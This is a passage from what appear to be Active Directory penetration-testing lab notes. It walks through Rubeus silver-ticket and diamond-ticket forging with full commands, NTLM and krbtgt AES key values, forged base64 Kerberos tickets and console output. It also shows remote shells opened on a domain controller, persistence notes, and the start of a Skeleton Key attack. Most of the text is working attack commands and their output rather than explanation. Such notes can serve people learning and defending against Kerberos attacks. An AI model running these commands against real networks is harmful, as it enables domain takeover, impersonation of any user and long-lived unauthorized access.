2e+Pr4iL+2DS9pwd63pWL8zET1usZihKEVAAsGq3v85X0Es8nIHhjS7cs+ZoPR/3Qv6ekcVBX7T4CDlb
VdCiiWxGBvIzAANKqPOEdsweC7YQD9S/MLOtkTDU0HLCm/t8qIczEEe3QfDpDsNjVHHu8/bSJmqkB03D
M4tfnv7T0z1QUQzC2NP+oCvNXr/MYmdg/zsvDe7BsDNtx//fuiBSokywvudywtMQAG5wG5OLeeMLu+uE
oj6o6aLCGBDB86f5xnBbATr04hE/5D0woVSyTMNDJTVaztX7NJLHsTOujF5okuohBeX6RZ4jAvxjXqDI
wdNDOS/IzK48i1WxKdxDkux8ZILsIhpN77R75SoqKz2o0+zPFbXw1D77XzKfdQBHJEqqY3l5A2vejA21
/vkdNwtPdLNa9tsf/Jm6sRUDKCn1bB8fr4O0yeZSVBJD0cLN5+nALBOD1abz2qPSen65CjensaRPgbRJ
B8TutLJC6ri4eLa2ILvUY3C/ErMioDB3/EDYLoZtMF2sMc8Df5gAqPpORaPr82VYfSC1EpYJnHgOMXmt
K2FmAeOUOIXBle+dl57jQ13ZFD2CPiOZ6+iFVh/KVVXc0VhXbYghYxXdPszhdHEsN7x7vBSqO2MmLLt0
Cz+S53aSeyzf87KDFNLnONzqOekqxEh/kdPEHsVCkkjW/6PRxj+G6nqVWfvd1cmlBSkg7ESqDBTWewZv
lYv0hrdUG1L5vHSnu/YC/hNpKYJ5UkljMow/F3WfQ9RghOHg+KQLqB16xMxExi+BolZtzPv8vJ6OG4LK
ksKzJHXD4Etv3B61HdohZtCbpphVjU//JPIv18HaHl82rPpGCBjI/Oeh4ykZPEKpEY2oMIanslSAF6hG
xX69YoQGs6OCATcwggEzoAMCAQCiggEqBIIBJn2CASIwggEeoIIBGjCCARYwggESoCswKaADAgESoSIE
IMtjjdscE2NVjCMqc6tT3F2ZYvfmbqV/JAfuGdqJuQOXoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxP
Q0FMohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQKAAAKQRGA8yMDI0MDYyODE1NTMxNVql
ERgPMjAyNDA2MjgxNTUzMTVaphEYDzIwMjQwNjI5MDE1MzE1WqcRGA8yMDI0MDcwNTE1NTMxNVqoHBsa
RE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUypNjA0oAMCAQKhLTArGwRDSUZTGyNkY29ycC1kYy5kb2xs
YXJjb3JwLm1vbmV5Y29ycC5sb2NhbA==

[+] Ticket successfully imported!

C:\Windows\system32>klist

Current LogonId is 0:0x56c861

Cached Tickets: (1)

#0> Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL

Server: CIFS/dcorp-dc.dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 6/28/2024 8:53:15 (local)
End Time: 6/28/2024 18:53:15 (local)
Renew Time: 7/5/2024 8:53:15 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:

C:\Windows\system32>dir \\dcorp-dc.dollarcorp.moneycorp.local\C$
Volume in drive \\dcorp-dc.dollarcorp.moneycorp.local\C$ has no label.
Volume Serial Number is 1A5A-FDE2

Directory of \\dcorp-dc.dollarcorp.moneycorp.local\C$

05/08/2021 01:20 AM <DIR> PerfLogs

11/14/2022 11:12 PM <DIR> Program Files
05/08/2021 02:40 AM <DIR> Program Files (x86)
05/18/2024 01:32 AM <DIR> Users
01/10/2024 01:59 AM <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 6,394,613,760 bytes free

NTLM hash
Rubeus.exe silver /service:<service>/<Hostname> /rc4:<NTLM Hash> /sid:<DomainSID> /ldap
/user:<User to Impersonate /domain:<Domain> /ptt
C:\Windows\system32>dir \\dcorp-dc.dollarcorp.moneycorp.local\C$
Access is denied.
C:\Windows\system32>C:\AD\Tools\Rubeus.exe silver /service:CIFS/dcorp-
dc.dollarcorp.moneycorp.local /rc4:81a9ccc2f44b988af78448ad78297ad5 /sid:S-1-5-21-719815819-
3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Build TGS

[*] Trying to query LDAP using LDAPS for user information on domain controller dcorp-
dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(samaccountname=Administrator)'
[*] Retrieving group and domain policy information over LDAP from domain controller dcorp-
dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group
Policy Creator Owners,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain
Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN=Built
in,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-719815819-3726368948-3917688648-
513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL error code ERROR_ACCESS_DENIED
(5)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and
PasswordMustChange PAC fields.
[*] Attempting to mount: \\us.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\us.dollarcorp.moneycorp.local\SYSVOL error code ERROR_BAD_NET_NAME (67)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and
PasswordMustChange PAC fields.
[*] Retrieving netbios name information over LDAP from domain controller dcorp-
dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for
'(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Retrieving group and domain policy information over LDAP from domain controller dcorp-
dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group
Policy Creator
Owners,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain
Admins,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN
=Builtin,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-1028785420-4100948154-
1806204659-513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL error code ERROR_ACCESS_DENIED
(5)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and
PasswordMustChange PAC fields.
[*] Attempting to mount: \\us.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\us.dollarcorp.moneycorp.local\SYSVOL error code ERROR_BAD_NET_NAME (67)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and
PasswordMustChange PAC fields.
[*] Retrieving netbios name information over LDAP from domain controller dcorp-
dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for
'(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Building PAC

[*] Domain : DOLLARCORP.MONEYCORP.LOCAL (dcorp)

[*] SID : S-1-5-21-719815819-3726368948-3917688648
[*] UserId : 500
[*] Groups : 544,512,520,513
[*] ServiceKey : 81A9CCC2F44B988AF78448AD78297AD5
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey : 81A9CCC2F44B988AF78448AD78297AD5
[*] KDCKeyType : KERB_CHECKSUM_HMAC_MD5
[*] Service : CIFS
[*] Target : dcorp-dc.dollarcorp.moneycorp.local

[*] Generating EncTicketPart

[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGS for 'Administrator' to 'CIFS/dcorp-dc.dollarcorp.moneycorp.local'

[*] AuthTime : 6/28/2024 8:57:34 AM

[*] StartTime : 6/28/2024 8:57:34 AM
[*] EndTime : 6/28/2024 6:57:34 PM
[*] RenewTill : 7/5/2024 8:57:34 AM

[*] base64(ticket.kirbi):

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
cnAubW9uZXljb3JwLmxvY2Fs

[+] Ticket successfully imported!

C:\Windows\system32>klist

Current LogonId is 0:0x5b2707

Cached Tickets: (1)

#0> Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL

Server: CIFS/dcorp-dc.dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 6/28/2024 8:57:34 (local)
End Time: 6/28/2024 18:57:34 (local)
Renew Time: 7/5/2024 8:57:34 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0
Kdc Called:

C:\Windows\system32>dir \\dcorp-dc.dollarcorp.moneycorp.local\C$\
Volume in drive \\dcorp-dc.dollarcorp.moneycorp.local\C$ has no label.
Volume Serial Number is 1A5A-FDE2

Directory of \\dcorp-dc.dollarcorp.moneycorp.local\C$

05/08/2021 01:20 AM <DIR> PerfLogs

11/14/2022 11:12 PM <DIR> Program Files
05/08/2021 02:40 AM <DIR> Program Files (x86)
05/18/2024 01:32 AM <DIR> Users
01/10/2024 01:59 AM <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 6,394,249,216 bytes free

Service Type Service (s) to be used in a silver ticket

Scheduling tasks HOST
File System CIFS
WMI HOST+RPCSS
WinRM HOST, HTTP
PowerShell Remoting HOST, HTTP, RPCSS

Persistence
The access remains valid as long as the service account's password remains unchanged. By default,
machine account passwords are reset for every 30 days. The persistence of Silver ticket is very less
compared to the Golden Tickets.

Diamond Ticket Attack

A Diamond ticket is created by decrypting a valid TGT, making changes to it, and re-encrypt it using the
AES keys of the krbtgt account.

Golden ticket is a TGT forging attack whereas Diamond Ticket is a TGT modification attack

The persistence of TGT ticket depends on the krbtgt account

A diamond ticket is more OPSEC safe as it has:

• Valid ticket times because a TGT issued by the DC is modified

• In golden ticket, there is no corresponding TGT request for TGS/Service Ticket requests as the TGT
is forged.

Execution
Rubeus.exe diamond /krbkey:<aes key of the krbtgt> /tgtdeleg /enctype:aes /ticketuser:<user to
impersonate> /domain:<Domain Name> /dc:<Domain Controller> /ticketuserid:<RID> /groups:<RID>
/createnetonly:<Process to open> /show /ptt

C:\Windows\system32>"C:\AD\Tools\Rubeus.exe" diamond
/krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /tgtdeleg /enctype:aes
/ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-
dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512
/createnetonly:C:\Windows\System32\cmd.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Diamond Ticket

[*] Showing process : True

[*] Username : 2NOLPPC3
[*] Domain : MUT5S0VA
[*] Password : PM1FDJB6
[+] Process : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 4484
[+] LUID : 0x67efd5

[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'

[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/dcorp-
dc.dollarcorp.moneycorp.local'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache:
A5j3/m/jvqqnTSLm5F9zk+LE6N29oivZSo4kNnOUzR4=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):

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
UC5MT0NBTA==

[*] Decrypting TGT

[*] Retreiving PAC
[*] Modifying PAC
[*] Signing PAC
[*] Encrypting Modified TGT

[*] base64(ticket.kirbi):

doIGZjCCBmKgAwIBBaEDAgEWooIFNjCCBTJhggUuMIIFKqADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOC
BNIwggTOoAMCARKhAwIBA6KCBMAEggS8lreMk19l8PWycqiwI3uovya2Zd/xSUi3owugdQb+beFWm6pa
EA0bw4la+R6m41ETE+wgKAs/wDFIv4BepjX+7v9tbiLm5bd1gCno9cP8LTdYFeMYp9ec4ssqdsMDRxk3
P1o+3hsZx2SDX8V3kVZRQQoBIDZlhuU49wcpFePHeJ8w1FxafZzT8eFRziUfc3Yd68h8iRbPQBDSIZ7V
U7ffdPwMI0O6ux7df2HnGotjkJuXqpByulQkFGMR+hftissb+UBR3JDhIo/gFkUOL3kuhVRc6zfPGOFW
c6Jf1CVX9wTqTbVi/EC7qVqdEBHbhn8mh9W8wUX1DFJwOzragBzu5lUd8lHlNt+V2v4lo2ZWZN4qIC4B
u81grgtce0PPXYShnKMkumTW7DskquF5VyUJP2mEbD4v5ST6R8wPU1ZmRxwNyBG04v/HadGFac9tYiWw
jgljQnXPN2eyvywyUzm9ZbGpHx22A4fjy6UvWmZFnIsIyaiMDfsYisUbTh1Zi7zY+oN6pVjjAt2t8fdt
NCMKbqcbftnBp/3ifHtVZh2nIW7kK0SES1gIaJ5A4so/u4WGxNW/hG3shgzONmpGL6q0DTHZBD7uWqvy
zqMo3aQewpPA6+4c4y0lSDyZrwYMf4YzyXVz+7UzmVRESkRhyVSoKPLHrsvuHUGVOsN2puJHKQYdGnHs
/FoRI2PZMcyuc+IWUEUfo4VRHI9evKQ95s23Uy7DznlBaGJGTHE9H7mMUVKh+EA6YFCY5bV5dd02HKQl
jKuVSOKk0XGKGU5Ppd9UJqJg/SVaoGYuRR7XbWyzc0bteL4OvcuOB/VxiHgAc9+iYFiOPpL4hxiD4PoQ
NqF6AtT6EwfTeYnmDIph+2tdf0SPwoWm0ZyjCutD/0YuPXKKx7Nil3D+msbuolZ2SUGzFfRAlN3aaaGr
C2g1NOfuMZBN2euYYiT58j64VYpANYObl2EZNbW0KMg2761ViO4mI12X4eA/DXh0hNv7XkND2JZJej/6
8Ws9VybaxgU3aGj0dbq1VGtMDMUO6fR40NlgYFjFm2AbfgzL04H52tjXE0MFe179TUOf9NisYmNzQScR
ZRkXBoi1+iPR/eEPy+4GKxY24KD4zMPzkd18uqG8hol6WL6vcP5sa3F7Egl6jWPy1eMByDKNYe1WlRT0
chn19fqh6oLALxJMDh2n1O4eFjK272J3QZfTphJMYOj/Ahi6Ti8gv1gh3hDj41NaCk4zrUm3ewT18Sh2
AzkcpisLctDJAiVZdeDF2JYIZh/TlZt1RQl0qBlazPKFO+lSLX1RFGDL0eZB9CaaTgLNuJ83bHaFxBWZ
TVGC8pt4z/JskPDM4C43NOltW9247+vkXxnuQ/3mAhWu9gg3xj18WWNF/Ct/ia1dq19rlxOtsDB2JLcj
TG26x/jTBW7XUyOidFLk1WYks7RRuFXA4pYqhRb1/aTNrZr+ZXH3YD/MARrDE6YOZTGCXgXrk0TeJPHu
sM4nuvDq+YRNCoNLrm3NhaSJdTEPSdmwP+OMlHKO/TZ+rmwY41SM+cd/cqPMl6jQ1RgD5RL8rhNXH1BP
2lXydttqT1W5IHOCbh439igJBNZ/Putv3xHA7ElDY9zaqHsIo4IBGjCCARagAwIBAKKCAQ0EggEJfYIB
BTCCAQGggf4wgfswgfigKzApoAMCARKhIgQgQkNd72y8bxW5pQjcuxxFV5PybPYkZqSCSdTI5Lh/igah
HBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUyiGjAYoAMCAQGhETAPGw1hZG1pbmlzdHJhdG9yowcD
BQBgoQAApREYDzIwMjQwNjI4MTYzMzIyWqYRGA8yMDI0MDYyOTAyMzEzNlqnERgPMjAyNDA3MDUxNjMx
MzZaqBwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMqS8wLaADAgECoSYwJBsGa3JidGd0GxpET0xM
QVJDT1JQLk1PTkVZQ09SUC5MT0NBTA==
[*] Target LUID: 0x67efd5
[+] Ticket successfully imported!

A new Command Prompt opens.

C:\Windows\system32>klist

Current LogonId is 0:0x67efd5

Cached Tickets: (1)

#0> Client: administrator @ DOLLARCORP.MONEYCORP.LOCAL

Server: krbtgt/DOLLARCORP.MONEYCORP.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
Start Time: 6/28/2024 9:33:22 (local)
End Time: 6/28/2024 19:31:36 (local)
Renew Time: 7/5/2024 9:31:36 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
C:\Windows\system32>dir \\dcorp-dc.dollarcorp.moneycorp.local\C$
Volume in drive \\dcorp-dc.dollarcorp.moneycorp.local\C$ has no label.
Volume Serial Number is 1A5A-FDE2

Directory of \\dcorp-dc.dollarcorp.moneycorp.local\C$

05/08/2021 01:20 AM <DIR> PerfLogs

11/14/2022 11:12 PM <DIR> Program Files
05/08/2021 02:40 AM <DIR> Program Files (x86)
05/18/2024 01:32 AM <DIR> Users
01/10/2024 01:59 AM <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 6,390,218,752 bytes free

C:\Windows\system32>winrs -r:dcorp-dc.dollarcorp.moneycorp.local cmd.exe

Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Administrator>set username
set username
USERNAME=administrator

C:\Users\Administrator>set computername
set computername
COMPUTERNAME=DCORP-DC

C:\Users\Administrator>exit
exit
C:\Windows\system32>Powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-dc.dollarcorp.moneycorp.local -

ScriptBlock { $env:username;$env:computername }
administrator
DCORP-DC

Persistence
Once a Diamond Ticket is created and used, the attacker can:

• Maintain Long-Term Access: Golden Tickets can have very long lifetimes, providing extended
access since the KRBTGT’s password is changed very rarely.

• Bypass Password Changes: Even if the user account passwords are changed, the Diamond Ticket
remains valid until the KRBTGT password is changed.

• Impersonate Any User: The attacker can forge TGTs for any user, giving them flexibility in their
attacks.

To invalidate any existing Golden Tickets, the KRBTGT’s password twice as password history is maintained
for the account.

Skeleton Key attack

The Skeleton Key is a particularly scary piece of malware targeted at Active Directory domains to make it
alarmingly easy to hijack any account. This malware injects itself into LSASS and creates a master
password that will work for any account in the domain. After that, we can authenticate as any user by
providing the same password, which by default is "mimikatz". If the authentication is performed for a
member of the Domain Admin group, we can get administrative access to a domain controller. Existing
passwords will also continue to work, so it is very difficult to know this attack has taken place unless you
know what to look for.

Requirements
In order to perpetrate this attack, the attacker must have Domain Admin rights. This attack must be
performed on each and every domain controller for complete compromise, but even targeting a single
domain controller can be effective. Rebooting a domain controller will remove this malware and it will
have to be redeployed by the attacker.

Execution
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:svcadmin
/aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec
/createnetonly:cmd.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Showing process : True

[*] Username : OHVJOGEJ
[*] Domain : 82D4OOQN
[*] Password : 5A65HR2D
[+] Process : 'cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 672
[+] LUID : 0x714ed4

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)

[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsvcadmin
[*] Using aes256_cts_hmac_sha1 hash:
6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Target LUID : 7425748
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIGAjCCBf6gAwIBBaEDAgEWooIE2TCCBNVhggTRMIIEzaADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOC
BHUwggRxoAMCARKhAwIBAqKCBGMEggRfXkFEblWleF0hfOSy2XQ52p927JJdLfos44aHssOyDII9i4LM
xNvILFNyAvnDEmmYimcqJNYWDK00CowvHVM/qMawHTklkcwRU1MjaFe31h1HrlYueJE6m7qJcT7pHr3A
2l9YooM5sdFyxLneOGDqf5BL49y50F5Em+mynnTCqzaMlC8zYpLeZYJg2GwdOdaKI9JYpsClVLqLQ9ll
